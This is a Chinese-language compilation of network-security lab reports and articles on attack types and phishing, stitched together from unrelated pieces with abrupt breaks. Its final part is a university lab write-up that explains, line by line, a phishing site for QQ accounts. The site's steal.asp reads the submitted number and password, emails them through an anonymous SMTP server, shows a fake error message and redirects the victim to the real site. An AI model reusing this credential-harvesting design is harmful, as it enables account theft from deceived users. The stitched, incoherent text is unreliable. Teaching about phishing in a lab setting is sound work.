实验三网站钓鱼攻击 实验报告
网络攻击实验报告
一、实验背景随着互联网技术的飞速发展,网络安全问题日益突出。
为了提高网络安全意识,掌握网络安全防护技能,我们进行了一次网络攻击实验。
本次实验旨在了解网络攻击的基本原理,熟悉常见的网络攻击手段,以及掌握相应的防御措施。
二、实验目的1. 理解网络攻击的基本原理和常见手段。
2. 掌握网络攻击实验的基本流程。
3. 熟悉网络安全防护技术,提高网络安全意识。
三、实验环境1. 操作系统:Windows 102. 网络设备:路由器、交换机、计算机3. 实验软件:Wireshark、Nmap、Metasploit等四、实验内容1. 漏洞扫描(1)使用Nmap扫描目标主机,发现潜在的安全漏洞。
(2)分析扫描结果,了解目标主机的开放端口和服务信息。
2. 拒绝服务攻击(DoS)(1)使用Metasploit生成大量的伪造请求,对目标主机进行DoS攻击。
(2)观察目标主机响应时间,分析攻击效果。
3. 口令破解(1)使用Hydra工具尝试破解目标主机的登录口令。
(2)观察破解过程,了解口令破解的原理。
4. 恶意代码传播(1)利用网络共享传播恶意代码,感染目标主机。
(2)分析恶意代码的传播过程,了解恶意代码的特点。
5. 数据窃取(1)使用网络监听工具,窃取目标主机传输的数据。
(2)分析窃取到的数据,了解数据窃取的原理。
五、实验结果与分析1. 漏洞扫描通过Nmap扫描,我们成功发现目标主机的开放端口和服务信息,发现了一些潜在的安全漏洞。
这为我们进行后续的攻击实验提供了依据。
2. 拒绝服务攻击(DoS)我们使用Metasploit生成了大量的伪造请求,对目标主机进行了DoS攻击。
观察目标主机的响应时间,发现攻击效果明显,目标主机无法正常响应服务。
3. 口令破解我们尝试破解目标主机的登录口令,使用Hydra工具进行暴力破解。
经过一段时间,成功破解了目标主机的口令。
4. 恶意代码传播我们利用网络共享传播恶意代码,成功感染了目标主机。
教学实践报告网络安全(3篇)
第1篇一、引言随着互联网技术的飞速发展,网络安全问题日益突出,已成为影响社会稳定和国家安全的重要因素。
为了提高学生的网络安全意识和技能,我校开展了网络安全教学实践。
本报告将详细阐述本次教学实践的过程、成果和反思。
二、教学实践过程1. 教学目标本次教学实践旨在使学生了解网络安全的基本概念、常见威胁、防护措施,提高学生的网络安全意识和自我保护能力。
2. 教学内容(1)网络安全概述:介绍网络安全的基本概念、网络安全的重要性、网络安全的发展历程。
(2)网络安全威胁:讲解常见的网络安全威胁,如病毒、木马、钓鱼网站、网络攻击等。
(3)网络安全防护措施:介绍网络安全防护的基本原则、常见防护措施,如防火墙、杀毒软件、安全浏览等。
(4)网络安全案例分析:分析真实案例,让学生了解网络安全问题的严重性和防范方法。
3. 教学方法(1)讲授法:教师通过讲解网络安全知识,使学生掌握基本概念和防护措施。
(2)案例分析法:通过分析真实案例,让学生了解网络安全问题的严重性和防范方法。
(3)互动式教学:鼓励学生提问、讨论,提高学生的参与度和学习效果。
(4)实践操作:引导学生进行网络安全防护操作,如安装杀毒软件、设置防火墙等。
三、教学成果1. 学生网络安全意识显著提高:通过本次教学实践,学生认识到网络安全的重要性,增强了自我保护意识。
2. 学生网络安全技能得到提升:学生掌握了网络安全防护的基本知识和技能,能够应对常见的网络安全威胁。
3. 学生参与度和学习效果良好:教学过程中,学生积极参与讨论、提问,学习效果显著。
四、反思与改进1. 教学内容应与时俱进:随着网络安全形势的变化,教学内容应及时更新,以适应社会需求。
2. 注重实践操作:在教学中,应增加实践操作环节,让学生在实际操作中掌握网络安全技能。
3. 强化案例教学:通过分析真实案例,让学生了解网络安全问题的严重性和防范方法。
4. 拓展教学资源:充分利用网络资源,丰富教学内容,提高教学质量。
《电子商务安全》实验
《电子商务安全》实验电子商务安全实验随着互联网的飞速发展,电子商务已经成为了人们购物的主要方式。
然而,电子商务也存在一定的风险,如个人信息泄露、支付安全等问题。
为了保障电子商务的安全,我们进行了一系列实验。
实验1:个人信息保护实验为了防止个人信息泄露,我们首先测试了一些常见的电子商务平台的个人信息保护措施。
我们注册了几个账号,并模拟了一些常见的操作,如填写个人资料、修改密码等。
通过分析平台的安全设置、加密算法等措施,我们评估了平台的安全性。
同时,我们还检测了平台是否存在漏洞,如SQL注入、跨站脚本等。
实验2:支付安全实验实验3:网络钓鱼实验网络钓鱼是一种常见的网络欺诈行为,通过伪装成合法的机构或个人,骗取用户的账号、密码等敏感信息。
为了提高人们的防范意识,我们进行了一次网络钓鱼实验。
我们发送了一些伪造的电子邮件或短信,要求用户点击链接或提供个人信息。
通过统计用户的反应,并向他们解释真实情况,提高了他们的网络安全意识。
实验4:移动端安全实验如今,移动端的电子商务已经得到了广泛应用。
为了确保移动端的安全性,我们对几个常见的电子商务App进行了测试。
我们分析了App的数据传输加密、权限管理等方面,评估了其安全性。
同时,我们还测试了App是否存在恶意代码、广告劫持等问题。
通过以上一系列实验,我们对电子商务的安全性进行了全面的评估,并提出了改进建议。
我们建议电子商务平台加强个人信息的保护措施,提供更安全的支付方式,并提高用户的网络安全意识。
同时,对于移动端的电子商务,需要加强App的安全性,以防止恶意攻击。
通过这些措施,我们相信电子商务的安全性可以得到进一步提升。
网络攻击的实验报告
一、实验背景随着信息技术的飞速发展,网络已经成为人们工作和生活中不可或缺的一部分。
然而,随之而来的网络安全问题也日益凸显。
为了提高对网络攻击的认识和防御能力,我们进行了本次网络攻击实验。
通过模拟网络攻击的过程,了解攻击者的攻击手段,以及防御网络攻击的方法。
二、实验目的1. 理解网络攻击的基本原理和常用手段。
2. 掌握网络安全防御的基本策略和工具。
3. 提高网络安全意识和自我保护能力。
三、实验环境1. 操作系统:Windows 102. 网络设备:路由器、交换机、PC机3. 软件环境:Wireshark、Nmap、Metasploit等网络安全工具四、实验步骤1. 信息收集利用Nmap扫描目标主机,获取目标主机的开放端口、操作系统等信息。
通过Wireshark抓取目标主机与网络之间的数据包,分析其网络流量。
2. 漏洞扫描利用Nmap对目标主机进行漏洞扫描,找出目标主机存在的安全漏洞。
3. 攻击模拟根据漏洞扫描结果,选择合适的攻击手段对目标主机进行攻击。
以下列举几种常见的网络攻击手段:(1)端口扫描攻击:通过扫描目标主机的开放端口,获取目标主机上的服务信息。
(2)拒绝服务攻击(DoS):通过大量请求占用目标主机资源,使目标主机无法正常响应。
(3)密码破解攻击:通过暴力破解、字典攻击等方法获取目标主机的登录凭证。
(4)木马攻击:通过植入木马程序,控制目标主机,获取敏感信息。
4. 攻击防御针对攻击模拟过程中发现的安全漏洞,采取相应的防御措施,如:(1)关闭不必要的开放端口,减少攻击面。
(2)更新操作系统和应用程序,修复已知漏洞。
(3)设置强密码,提高登录凭证的安全性。
(4)安装防火墙、入侵检测系统等安全设备,及时发现和阻止攻击。
五、实验结果与分析1. 通过信息收集,我们发现目标主机存在多个开放端口,其中包含Web服务、邮件服务、数据库服务等。
2. 漏洞扫描结果显示,目标主机存在多个安全漏洞,如:Web服务漏洞、数据库服务漏洞等。
网络安全攻击实验报告
网络安全攻击实验报告实验目的:本实验旨在通过模拟网络安全攻击的过程,提升对网络安全的认识,了解各种常见网络攻击的原理和防范措施。
实验设备:1. 一台Windows操作系统的计算机,作为实验的攻击者。
2. 一台Windows操作系统的计算机,作为实验的受攻击者。
3. 一台Linux操作系统的计算机,作为实验的网络防火墙。
实验步骤:1. 配置网络环境:将攻击者、受攻击者和防火墙连接到同一个局域网中,并进行正确的IP地址配置。
2. 确认网络连接正常后,开始进行模拟攻击。
实验一:ARP欺骗攻击1. 攻击者使用工具发送恶意ARP包,将受攻击者的IP地址与攻击者自己的MAC地址对应起来,以此实现网络欺骗。
2. 受攻击者在收到ARP包后,将误认为攻击者的计算机是网关,并将网络流量发送至攻击者的计算机。
3. 防火墙通过监测网络流量,检测到ARP欺骗攻击,将受攻击者的网络流量重定向至正确的网关。
实验二:DDoS攻击1. 攻击者利用工具向受攻击者发送大量正常请求,使其服务器超负荷运作,无法正常提供服务。
2. 受攻击者的服务器在处理这些请求时,耗尽系统资源,导致服务阻塞或崩溃。
3. 防火墙通过检测到大量请求来自同一IP地址,将该IP地址列入黑名单,过滤掉恶意流量,减轻服务器负荷。
实验三:SQL注入攻击1. 攻击者利用软件工具,通过在Web应用程序的输入字段中插入SQL代码,获取或篡改数据库中的数据。
2. 受攻击者的Web应用程序在处理请求时,未对输入字段进行正确的过滤或转义,导致攻击者成功执行注入攻击。
3. 防火墙通过检测到包含恶意SQL代码的请求,拦截并阻止恶意请求,保护数据库安全。
实验结果:1. 在实验一中,通过ARP欺骗攻击,攻击者成功将受攻击者的网络流量重定向至正确的网关,防火墙成功阻止了欺骗攻击。
2. 在实验二中,通过DDoS攻击,受攻击者的服务器遭受了大量请求的压力,导致服务不可用,防火墙成功进行了恶意流量过滤。
网络攻击实验报告
网络攻击实验报告网络攻击实验报告一、引言如今,随着互联网的普及和信息技术的快速发展,网络攻击已经成为一个严重的威胁。
为了更好地了解网络攻击的形式和对策,我们进行了一次网络攻击实验。
本报告旨在总结实验过程和结果,以及对网络安全的思考。
二、实验目的1. 了解网络攻击的分类和常见形式;2. 掌握网络攻击的基本原理和技术;3. 分析网络攻击对系统和个人的威胁;4. 提出网络安全的对策和建议。
三、实验过程1. 收集资料:我们首先收集了有关网络攻击的资料,包括黑客技术、病毒传播、网络钓鱼等方面的知识,以便更好地理解和设计实验。
2. 搭建实验环境:我们在一个隔离的局域网中搭建了一个模拟的网络环境,包括服务器、客户端和防火墙等设备。
3. 进行攻击:我们使用了一些常见的网络攻击手段,如DDoS攻击、SQL注入、密码破解等,对实验环境进行了攻击。
4. 监测和分析:在攻击过程中,我们使用了网络监测工具,对攻击的流量、来源和目标进行了监测和分析。
5. 防御和修复:在攻击结束后,我们对受攻击的系统进行了修复和防御措施的加强,以提高网络安全性。
四、实验结果1. 攻击形式:我们进行了多种类型的网络攻击,包括DoS攻击、恶意软件传播、社交工程等。
这些攻击手段都能够造成不同程度的系统瘫痪、信息泄露和财产损失。
2. 攻击效果:在实验中,我们成功地进行了攻击,并且造成了一定的破坏。
特别是DDoS攻击,使得服务器无法正常工作,导致系统瘫痪,用户无法访问网站。
3. 防御策略:在攻击结束后,我们加强了系统的防御措施,包括更新防火墙规则、加强密码安全、定期备份数据等。
这些措施能够有效地减少系统受到攻击的概率,提高网络安全性。
五、思考与建议1. 意识提升:网络攻击已经成为一个严重的威胁,我们应该提高对网络安全的意识,不随意点击可疑链接、下载不明软件,保护个人隐私和财产安全。
2. 加强防御:作为个人或组织,我们应该加强网络防御措施,包括使用强密码、定期更新软件补丁、安装杀毒软件等,以减少受到攻击的风险。
社会工程学之网络钓鱼攻击案例分析(文档)
[原创]社会工程学之网络钓鱼攻击案例分析(文档)社会工程学(SocialEngineering),一种通过对受害者心理弱点、本能反应、好奇心、信任、贪婪等心理陷阱进行诸如欺骗、伤害等危害手段,取得自身利益的手法,近年来已成迅速上升甚至滥用的趋势.那么,什么算是社会工程学呢?它并不能等同于一般的欺骗手法,社会工程学尤其复杂,即使自认为最警惕最小心的人,一样会被高明的社会工程学手段损害利益. 总体上来说,社会工程学就是使人们顺从你的意愿、满足你的欲望的一门艺术与学问。
它并不单纯是一种控制意志的途径,但它不能帮助你掌握人们在非正常意识以外的行为,且学习与运用这门学问一点也不容易。
它同样也蕴涵了各式各样的灵活的构思与变化着的因素。
无论任何时候,在需要套取到所需要的信息之前,社会工程学的实施者都必须:掌握大量的相关知识基础、花时间去从事资料的收集与进行必要的如交谈性质的沟通行为。
与以往的的入侵行为相类似,社会工程学在实施以前都是要完成很多相关的准备工作的,这些工作甚至要比其本身还要更为繁重.社会工程学陷阱就是通常以交谈、欺骗、假冒或口语等方式,从合法用户中套取用户系统的秘密,例如:用户名单、用户密码及网络结构。
只要有一个人抗拒不了本身的好奇心看了邮件,病毒就可以大行肆虐。
MYDOOM与Bagle都是利用社会工程学陷阱得逞的病毒。
从社会工程学慢慢伸延出以其为首要核心技术的攻击手法,网络钓鱼攻击、密码心理学以及一些利用社会工程学渗入目标企业或者内部得到所需要信息的大胆手法.社会工程学是一种与普通的欺骗/诈骗不同层次的手法,因为社会工程学需要搜集大量的信息针对对方的实际情况,进行心理战术的一种手法.系统以及程序所带来的安全往往是可以避免得,而在人性以及心理的方面来说,社会工程学往往是一种利用人性脆弱点,贪婪等等的心理表现进行攻击,是防不胜防的.借此我们从现有的社会工程学攻击的手法来进行分析,借用分析来提高我们对于社会工程学的一些防范方法.网络钓鱼攻击手法网络钓鱼(Phishing)一词,是“Fishing”和“Phone”的综合体,由于黑客始祖起初是以电话作案,所以用“Ph”来取代“F”,创造了”Phishing”,Phishing发音与Fishing相同。
钓鱼领域研究报告
钓鱼领域研究报告1. 研究背景钓鱼是一种常见的网络攻击手段,通过冒充合法的实体,诱骗用户提供敏感信息,如用户名、密码、银行账户等。
钓鱼攻击对个人和组织的信息安全带来了巨大威胁。
本研究报告旨在深入研究钓鱼攻击的现状、技巧和防御策略,以提高人们对钓鱼攻击的认知,并为信息安全防护提供参考。
2. 钓鱼攻击的种类钓鱼攻击可分为以下几种类型:2.1 电子邮件钓鱼电子邮件是最常见的钓鱼攻击手段之一。
攻击者利用伪造的电子邮件冒充合法机构发送给目标用户,诱骗其点击恶意链接或下载恶意附件。
这种攻击方式广泛应用于网络盗窃、恶意软件传播等领域。
2.2 网站钓鱼网站钓鱼通过冒充合法的网站,欺骗用户输入个人信息,如用户名、密码、信用卡号等。
攻击者通常通过仿制合法网站的外观和网址来诱使用户上当。
2.3 短信钓鱼短信钓鱼是指通过发送恶意短信,诱骗用户点击链接或回复短信提供个人信息。
这种钓鱼方式常用于欺诈、信息收集等非法活动。
3. 钓鱼攻击技巧3.1 社会工程学技巧钓鱼攻击者常利用社会工程学技巧,通过伪装成可信赖的实体,引诱受害者提供敏感信息。
社会工程学技巧包括:伪装身份、制造紧急情况、利用人们的好奇心、扮演权威角色等。
3.2 仿冒网站和邮件攻击者通过仿冒合法网站和电子邮件的外观,让受害者无法分辨真假。
他们可能使用类似的网站地址、公司标志、布局和语言风格来混淆用户,提高成功的几率。
3.3 特定目标钓鱼攻击特定目标钓鱼攻击是指攻击者针对特定个人或组织进行的精心策划的攻击。
钓鱼者会针对特定目标收集大量信息,设计出更具针对性的钓鱼策略,增加攻击的成功率。
4. 钓鱼攻击的危害钓鱼攻击给个人和组织的信息安全带来巨大威胁,可能导致以下危害:•个人隐私泄露:用户提供的个人敏感信息可能被攻击者获取,包括用户名、密码、信用卡号等。
•财产损失:攻击者可以利用获得的敏感信息窃取用户财产,如盗刷银行账户、套现虚拟货币等。
•信用卡欺诈:攻击者通过盗取信用卡信息,进行非法购物和盗刷。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
南京工程学院实验报告题目网站钓鱼攻击课程名称网络与信息安全技术院(系、部、中心)计算机工程学院专业网络工程班级学生姓名学号设计地点信息楼A216 指导教师毛云贵实验时间 2014年3月20日实验成绩一实验目的1.了解钓鱼攻击的概念和实现原理2.了解钓鱼网站和正常网站的区别3.提高抵御钓鱼攻击的能力二实验环境Windows,交换网络结构,UltraEdit三实验原理3.1.什么是钓鱼网站网络钓鱼是通过大量发送声称来自于银行或其他知名机构的欺骗性垃圾邮件,意图引诱收信人给出敏感信息(如用户名、口令、帐号ID、ATM PIN码或信用卡详细信息)的一种攻击方式。
最典型的网络钓鱼攻击将收信人引诱到一个通过精心设计与目标组织的网站非常相似的钓鱼网站上,并获取收信人在此网站上输入的个人敏感信息,通常这个攻击过程不会让受害者警觉。
这些个人信息对黑客们具有非常大的吸引力,因为这些信息使得他们可以假冒受害者进行欺诈性金融交易,从而获得经济利益。
受害者经常遭受严重的经济损失或个人信息被窃取。
钓鱼网站通常伪装成为银行网站,窃取访问者提交的账号和密码信息。
它一般通过电子邮件传播,此类邮件中包含一个经过伪装的链接,该链接将收件人链接到钓鱼网站。
钓鱼网站的页面与真实网站界面完全一致,要求访问者提交账号和密码。
一般来说钓鱼网站结构很简单,只是一个或几个页面,URL和真实网站有细微差别,如真实的工行网站为,针对工行的钓鱼网站则可能为。
3.2.钓鱼网站的防范措施1.启用专用域名现在的网址有好几种,是一个商业性网站,而是政府网站,则是非政府组织网站。
域名不同,代表的意思也不同。
因此可以借鉴政府网站有专用域名做法,为网上银行设置专用域名。
这种作法虽然从根本上无法杜绝钓鱼网站的存在,但确实在很大程度上打击了假冒的网银网站。
2.规范搜索引擎在网银安全问题上,银行惟一能采取的办法就是投入大量的人力物力,不间断地在网上通过人工或是自动搜索同自己域名类似的假冒网站、网络实名,甚至必须介入电子邮件搜索是否有人假借银行名义行欺骗之实,即使是几个银行联合起来打假,平摊的只是成本,技术始终是个难题。
因此可以规范搜索引擎,从搜索引擎层面上来干预与网上银行域名类似的网站。
3.银行数字证书银行可以通过使用银行证书的方式来验明网上银行的正身,只有拥有正确的证书才能证明该网站是正确的网上银行而不是钓鱼网站。
4.客户安全使用网银(1)避免使用搜索引擎从正规银行网点取得网络银行网址并牢记,登录网银时尽量避免使用搜索引擎或网络实名,以免混淆视听。
(2)设置混合密码、双密码密码设置应避免与个人资料相关,建议选用数字、字母混合密码,提高密码破解难度并妥善保管,交易密码尽量与信用卡密码不同。
(3)定期查看交易记录定期查看网银办理的转帐和支付等业务记录,或通过短信定制账户变动通知,随时掌握账户变动情况。
(4)妥善保管数字证书避免在公用计算机上使用网银,以防数字证书等机密资料落入他人之手。
(5)警惕电子邮件链接网上银行一般不会通过电子邮件发出“系统维护、升级”提示,若遇重大事件,系统必须暂停服务,银行会提前公告顾客。
一旦发现资料被盗,应立即修改相关交易密码或进行银行卡挂失。
三.钓鱼网站的关键源码分析钓鱼网站的位置:“C:\ExpNIS\SocEng-Lab\Fishing\钓鱼网站\qqqet”,用UltraEdit-32可查看或编辑源码。
钓鱼网站构造比较简单,主要组成部分其实就是两个文件index.htm,steal.asp。
index.htm为钓鱼网站的前台表现页面,steal.asp为钓鱼网站的后台控制程序。
具体分析一下这两个文件。
1.index.htm文件用户使用域名“”登录钓鱼网站后,进入的页面就是index.htm,该页是钓鱼网站的表现页面,其主要完成表单提交,用户信息是否为空的验证,验证用户信息不为空的话,就将用户输入的信息传入steal.asp。
页面源码中很多都是为页面的表现形式,表现效果服务的,这些源码不做分析。
下面分析一下关键代码:上行代码解析:(1)“name”是表单的名称,这里给该表单命名为“form1”。
(2)“onsubmit="return checkinput()"”是提交表单之前执行的方法,在下一大段代码中会具体介绍checkinput()方法。
(3)“action=steal.asp”是提交表单后跳转的文件,这里是跳转到steal.asp。
(4)“method=post”是表单提交方法,该方法有两种,一种是post,一种是get。
post是隐含参数提交,就是提交的时候url中不显示用户名,密码信息。
get是显示参数提交,就是提交的时候url中显示用户名,密码信息。
上段代码大部分都是效果和表现形式,关键的部分用粗体字代替。
这段代码是建立一个文本输入框,“type=text”是给输入框的类型定义为文本形式,“name=u”是将文本输入框的名称定义为“u”,“u.value”就是文本框输入的内容。
上段代码是建立一个密码输入框,“type=password”是给输入框定义为密码形式,“name=p”是将密码输入框的名称定义为“p”,“p.value”就是密码框输入的内容。
上段代码的意思是建立一个登录的按钮,用于提交用户信息的。
表单部分的代码中onsubmit="return checkinput()"”,它的意思是调用下面这段代码。
上段代码解析:(1)“if(document.form1.u.value=="")”if条件判断,“document.form1.u.value”是取得文本框中内容,也就是QQ号码,对它进行判断,判断它的内容是不是空值,如果是空值,就执行下面{}中的内容。
(2)“alert("您还没有输入QQ号码")”alert是弹出对话框,对话框的内容是“您还没有输入QQ号码”。
(3)“document.form1.u.focus()”将鼠标焦点定位到文本框的位置。
(4)“return false”返回值是“false”,即不提交表单内容,返回“index.htm”。
2.steal.asp文件用户提交表单后,将用户信息传入steal.asp中,在steal.asp中进行业务逻辑处理。
具体处理的内容:将用户信息以邮件的形式发送到指定邮箱,弹出误导对话框,引导到正常网站。
关键代码解析:上段代码解析:代码中引用VBScript脚本语言,“u=request.form("u")”在该页取得表单提交的文本框内容,即QQ号码,定义为“u”,“p=request.form("p")”在该页取得表单提交的密码框内容,即QQ密码,定义为“p”。
下面这段代码是引用vbs脚本,功能是负发送邮件(将用户输入的内容,以邮件的形式发送到指定邮箱)。
上段关键代码解析:(1)“NameSpace="/cdo/configuration/"”定义NameSpace命名空间。
(2)“Set Email = CreateObject("CDO.Message")”开启邮件服务。
(3)“Email.From="*********************"”邮件发送方的邮箱。
(4)“Email.To="********************"”邮件接收方的邮箱。
(5)“Email.Subject = "username and password"”发送邮件的主题。
(6)“Email.Textbody = "username:" & u & " " &"password:" & p”发送邮件的具体内容,即username:“用户的QQ号码”,password:“用户的QQ密码”。
(7)“Item(NameSpace&"smtpse rver") = "172.16.0.254"”接收邮件的服务器。
(8)“Item(NameSpace&"smtpauthenticate") = 0”设置邮件发送者是否为匿名用户发送,设置为0则为匿名用户发送,若设置为0则不用设置“Email.From”的邮箱(发送者的邮箱)。
设置为1则为真实存在的用户发送,发送者的邮箱,邮箱的用户名,密码必须是真实存在的,即“Email.From”,“Item(NameSpace&"sendusername")”,“Item(NameSpace&"sendpassword")”必须设置真实存在的邮箱名,邮箱用户名,邮箱密码。
此处作为攻击用,必须设置为0。
(9)“Item(NameSpace&"sendusername") = "any"”和“Item(NameSpace&"sendpassword") = "any"”邮件发送者的邮箱用户名,因为“Item(NameSpace&"smtpauthenticate")”设置为0,所以这两句脚本没用到,用'注释掉了。
(10)“Update”将上面设置的内容在程序执行的时候更新确认。
(11)“Email.Send”邮件发送出去。
下面的代码主要是欺骗误登录钓鱼网站的用户,将用户引导到正常网站。
上段代码很多处都是html标签,用于网页显示。
关键代码是javascript 部分,解析如下:(1)“alert("用户名或密码输入错误!")”弹出提示对话框,对话框内容是“用户名或密码输入错误!”。
(2)“window.location="";”将用户引导到正常网站,用的是javascript中“window.location”方法。
用法就是window.location=“要跳转到的地址(域名或ip地址)”。
钓鱼网站关键的源码分析完毕,正常网站的源码只有一个index.htm文件,和钓鱼网站中的index.htm文件类似,不做具体分析。
四实验方法及步骤本练习主机A、B、C为一组,D、E、F为一组,下面以主机A、B、C为例,说明实验步骤首先使用“快照X”恢复Windows系统环境。
一.初始化环境的准备1.主机A的操作(1)主机A配置Outlook Express邮箱,建立邮件帐户(参见附录A-Outlook Express配置方法)。